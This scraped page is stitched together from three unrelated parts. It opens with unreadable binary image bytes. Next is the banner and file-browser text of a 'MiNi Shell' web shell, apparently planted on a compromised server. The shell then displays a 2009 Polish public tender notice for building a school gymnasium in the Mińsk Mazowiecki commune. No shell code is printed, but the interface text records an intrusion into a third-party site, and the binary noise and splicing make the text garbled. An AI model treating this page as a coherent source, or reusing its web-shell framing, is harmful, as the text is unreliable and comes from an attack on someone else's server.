JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/24371-N-2009.html

<p class="kh_header"><b>Mińsk Mazowiecki: BUDOWA SALI GIMNASTYCZNEJ PRZY ZESPOLE SZKÓŁ W STOJADŁACH - GM. MIŃSK MAZOWIECKI</b><br>
<b>Numer ogłoszenia: 24371 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Mińsk Mazowiecki , ul. Chełmońskiego 14, 05-300 Mińsk Mazowiecki, woj. mazowieckie, tel. 025 7582851, faks 025 7582489.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.minskmazowieck.pl, www.bip.minskmazowiecki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA SALI GIMNASTYCZNEJ PRZY ZESPOLE SZKÓŁ W STOJADŁACH - GM. MIŃSK MAZOWIECKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
BUDOWA SALI GIMNASTYCZNEJ PRZY ZESPOLE SZKÓŁ W STOJADŁACH - GM. MIŃSK MAZOWIECKI 
2.	Ogólna charakterystyka obiektu i robót do wykonania w ramach przedmiotu zamówienia.
Przeznaczenie i program użytkowy:
    Zaprojektowany budynek  sali gimnastycznej  wraz z częścią zapleczową,  na 
    podstawie ustaleń z Inwestorem, realizowany jest jako drugi etap budowy szkoły. 
   Wykonana jest cześć dydaktyczna oraz fundamenty sali gimnastycznej.
    Program użytkowy, zgodnie ze specyfikacją istotnych warunków zamówienia i wytycznymi 
    programowo-funkcjonalnymi, obejmuje:
    - Halę sportową o wymiarach wewnętrznych areny sportowej 12x24 m.
    - Magazyn sprzętu sportowego połączony bezpośrednio z areną.
    - Dwa zespoły szatniowo-sanitarne dla ćwiczących, obsługujące hale sportową: zespół dla
       chłopców i zespół dla dziewcząt.
    - Korytarz komunikacyjny otwarty na halę sportową.

  Zestawienie powierzchni:
   - powierzchnia zabudowana	603,00 m2,
   - powierzchnia całkowita	603,00 m2,
   - kubatura	3 300,00 m3,
   - powierzchnia użytkowa	536,20 m2.

Zakres prac do wykonania
- Roboty budowlane z uzupełnieniem ścian fundamentowych.
- Roboty instalacji sanitarnych:
   - instalacja wodno-kanalizacyjna,
   - instalacja centralnego ogrzewania,
   - instalacja wentylacji mechanicznej.
- Roboty instalacji elektrycznej.

3. W ramach zadania Wykonawca wykona pełen zakres robót określony w dokumentacji projektowej oraz przedmiarze robót w sposób zgodny ze specyfikacją techniczną wykonania i odbioru robót budowlanych (STWOiR), jak również wszelkie zobowiązania wynikające z wzoru umowy oraz SIWZ.  Szczegółowy zakres prac do wykonania przedstawia przedmiar robót, na podstawie którego Wykonawca określi wynagrodzenie za przedmiot zamówienia. Zakres zadania obejmuje również dostawę i montaż wyposażenia obiektu tj. sprzętu sportowego. Wymienione dokumenty są załącznikami SIWZ i wraz z nią są zamieszczone na stronie internetowej zamawiającego www.bip.minskmazowiecki.pl oraz są dostępne w biurze prowadzącego postępowanie (Mińsk Mazowiecki, ul. Chełmońskiego 14 pok. 9).
4. Wykonawca, do wykonania zamówienia, będzie stosował wyroby budowlane wprowadzone do obrotu na zasadach określonych w ustawie z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r.  Nr 92 poz. 881 z późn. zm.)
5.  Zakres robót oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także:
1)	organizację i zagospodarowanie placu budowy oraz zaplecza budowy, ustanowienie kierownika budowy, kierowników robót oraz wykonanie planu bezpieczeństwa i ochrony zdrowia, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r. Nr 120, poz. 1126).
2)	po zakończeniu robót doprowadzenie terenu budowy do stanu pierwotnego, demontaż obiektów tymczasowych oraz uporządkowanie terenu,
3)	wszelkie zobowiązania wynikające z wzoru umowy załączonego do SIWZ (zał. nr 4) 
6.  Zamawiający wymaga udzielenia przez Wykonawcę 48 miesięcznej gwarancji jakości.      Gwarancja rozpoczyna swój bieg od daty odbioru końcowego. Wykonawca jest odpowiedzialny z tytułu rękojmi za wady fizyczne przedmiotu umowy istniejące w czasie dokonywania czynności odbioru oraz za wady powstałe po odbiorze, lecz z  przyczyn tkwiących w wykonanym przedmiocie umowy w chwili odbioru. 
7.  W przypadku, gdy termin ważności polisy, o której mowa w rozdziale 6 pkt D1 SIWZ upływa  przed terminem zakończenia robót objętych niniejszym zamówieniem, wówczas wybrany  Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu nowej polisy przed upływem ważności polisy poprzedniej. Nie dokonanie powyższego będzie stanowiło podstawę do wstrzymania robót z dniem upływu ważności polisy i naliczania kar umownych za spowodowanie przerwy w realizacji zamówienia z przyczyn zależnych od Wykonawcy do czasu przedstawienia Zamawiającemu nowej polisy.
8.  Przekazanie placu budowy wybranemu wykonawcy nastąpi w terminie do 7 dni od daty zawarcia umowy. 
9. Odbioru robót dokonuje Zamawiający i wyznaczeni przez Zamawiającego przedstawiciele w obecności Wykonawcy i inspektora nadzoru. Odbiór końcowy robót zostanie przeprowadzony przez Zamawiającego w ciągu 14 dni, a odbiór częściowy w  7 dni od daty pisemnego zgłoszenia ich do odbioru, przy czym zgłoszenie to musi być potwierdzone przez inspektora nadzoru, iż prace zostały wykonane zgodnie z umową i obiekt pozbawiony jest wszelkich wad. Do zgłoszenia zakończenia robót Wykonawca załącza dokumenty wymagane ustawami i wydanymi na ich podstawie przepisami wykonawczymi.
10.  Brak jakiegokolwiek z dokumentów wymienionych w pkt 9 lub też brak potwierdzenia przez inspektora nadzoru, że prace zostały wykonane zgodnie z umową i obiekt  jest pozbawiony wszelkich wad spowoduje nie przystąpienie przez Zamawiającego do dokonania odbioru robót.
11.  Rozliczenie wynagrodzenia za wykonanie przedmiotu umowy nastąpi fakturami częściowymi za całkowicie zakończone etapy lub elementy robót ustalone zgodnie z harmonogramem organizacji i wykonania przedmiotu umowy. Wystawienie faktur następuje na podstawie podpisanego przez Zamawiającego protokołu odbioru  częściowego, a faktury końcowej na podstawie podpisanego przez Zamawiającego protokołu odbioru  końcowego. Termin płatności faktur wynosi 30 dni od daty otrzymania przez Zamawiającego faktury wraz z dokumentami  rozliczeniowymi.
12. Wskazane  przez Zamawiającego  nazwy własne producentów nie są wiążące dla Wykonawcy, należy je traktować jako materiały przykładowe do określenia  parametrów i wymogów  technicznych. Zamawiający dopuszcza zastosowanie materiałów o parametrach nie gorszych niż wskazane przez Zamawiającego. Wykonawca który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest zobowiązany wskazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego w załączonej specyfikacji  technicznej wykonania i odbioru robót (STWOiR) oraz dokumentacji projektowej.
13.  Zamawiający w trakcie wykonywania robót będzie żądał od Wykonawcy przestawienia odpowiednich aprobat technicznych. Wykonawca zobowiązany jest do prowadzenia ciągłych badań określonych w SST (Szczegółowa Specyfikacja Techniczna) w celu udokumentowania, że materiały uzyskane z dopuszczalnego źródła spełniają wymagania SST w czasie postępu robót. Pozostałe materiały budowlane powinny spełniać wymagania jakościowe określone Polskimi Normami, aprobatami technicznymi, o których mowa w Szczegółowych Specyfikacjach Technicznych (SST)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.22-8, 45.22.35.00-1, 45.33.23.00-6, 45.33.12.10-1, 45.31.00.00-3, 45.33.22.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca musi wnieść wadium w wysokości 40 000,00 zł. (słownie: czterdzieści tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy: 1.1  Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
       ustawy nakładają obowiązek posiadania takich uprawnień. 1.2  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
osobami zdolnymi do wykonania zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności: 
a) dysponują osobą posiadającą uprawnienia budowlane  do kierowania robotami w specjalności konstrukcyjno - budowlanej, należącą do właściwego samorządu zawodowego, której to osobie zamierza powierzyć  funkcję kierownika budowy lub równoważne im  ważne uprawnienia wydane według wcześniejszych przepisów, 
b) dysponują osobą posiadającą  uprawnienia budowlane do kierowania robotami  w  specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, należącą do  właściwego    samorządu zawodowego, której to osobie zamierza powierzyć  funkcję kierownika robót lub równoważne im  ważne uprawnienia wydane według wcześniejszych  przepisów,
c) dysponują osobą posiadającą uprawnienia do kierowania robotami  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, należącą do właściwego samorządu zawodowego, której to osobie zamierza powierzyć  funkcję kierownika robót lub równoważne im  ważne uprawnienia wydane według wcześniejszych  przepisów.
1.3  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 1.4  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty Wykonawcy:

A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - sporządzony według wzoru druku załączonego do SIWZ (zał. nr 1).  A.2) Kosztorys ofertowy - sporządzony na podstawie załączonego do SIWZ (zał. nr 2) 
        przedmiaru robót zgodnie z rozdz. 10 pkt 1.5 SIWZ.
A.3) Harmonogram rzeczowy organizacji i wykonania robót określający szczegółowy zakres z 
        podziałem na poszczególne etapy, terminy oraz kwoty wynagrodzenia należne 
        Wykonawcy za wykonane etapy robót - sporządzony według wzoru druku załączonego do 
        SIWZ (zał. nr 7) 
B. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty: B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub
        zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy
        przed upływem terminu składania ofert.   B.2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego 
        oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
        Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem 
        podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
        że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
        płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
        nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.   B.3) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie 
        właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
        określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
        upływem terminu składania ofert.   B.4) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
         pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   B.5)  Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa 
         zamówień publicznych - sporządzony według wzoru druku załączonego do SIWZ (zał. nr
         3)

C . W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej  
  wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:  C.1)  Wykaz wykonanych robót budowlanych (sporządzony według wzoru załączonego do SIWZ
           - zał. nr 5) w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.  Za minimum Zamawiający uznaje wykonanie jednego obiektu kubaturowego użyteczności publicznej o wartości 1 400 000 zł. 
C.2)  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z 
            informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia 
            niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich 
czynności oraz załączeniem dokumentów potwierdzających, że osoba  wskazana na kierownika budowy i kierownika robót branżowych  posiada wymagane uprawnienia  oraz aktualne zaświadczenie o przynależności tej osoby  do właściwego samorządu zawodowego - sporządzony według wzoru załączonego do SIWZ (zał. nr 6). Za minimum Zamawiający uznaje wskazanie osób o których mowa w rozdz. 5 pkt 1.2 SIWZ.
C.3) W przypadku gdy w wykazie opisanym w pkt C.2 Wykonawca wskazał osoby którymi będzie dysponował - obowiązany jest do wykazu dołączyć pisemne zobowiązanie  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:  D.1)   Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
D.2)   Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
          Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków 
          finansowych lub zdolność kredytową Wykonawcy w wysokości co najmniej 1 400 000  zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.minskmazowiecki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Minsk Mazowiecki ul. Chełmońskiego 14 pok. 9,  05-300 Mińsk Mazowiecki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 10:00, miejsce: Urząd Gminy Mińsk Mazowiecki, ul. Chełmońskiego 14, 05-300 Mińsk Mazowiecki pok. 102..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com